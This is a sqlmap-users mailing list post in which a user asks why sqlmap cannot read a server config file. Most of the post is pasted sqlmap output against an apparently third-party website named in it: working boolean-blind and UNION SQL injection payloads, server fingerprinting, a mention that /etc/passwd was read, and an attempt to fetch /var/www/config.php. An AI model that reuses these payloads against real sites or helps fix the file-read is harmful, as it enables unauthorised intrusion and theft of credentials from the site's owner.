Hi all,

I use file-read to retrieve files on the server.

/etc/passwd works,

but for other files the response is as follows.

[16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
[16:44:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) 
requests:
---
Place: GET
Parameter: su_sd
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650

    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL, 
CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL, 
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&pe=650
---

[16:44:16] [INFO] the back-end DBMS is MySQL
[16:44:16] [INFO] fetching banner
web server operating system: Linux Fedora 15 (Lovelock)
web application technology: PHP 5.3.8, Apache 2.2.17
back-end DBMS: MySQL 5
banner:    '5.1.60'

[16:44:16] [INFO] fingerprinting the back-end DBMS operating system
[16:44:16] [INFO] the back-end DBMS operating system is Linux
[16:44:16] [INFO] fetching file: '/var/www/config.php'
[16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length 
hexadecimal string which it is not able to convert to raw string
/var/www/config.php file saved to:    
'/pentest/database/sqlmap/output/www.kangyang.com.tw/files/_var_www_config.php'

[16:44:16] [INFO] fetched data logged to text files under 
'/pentest/database/sqlmap/output/www.kangyang.com.tw'

[*] shutting down at 16:44:16
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
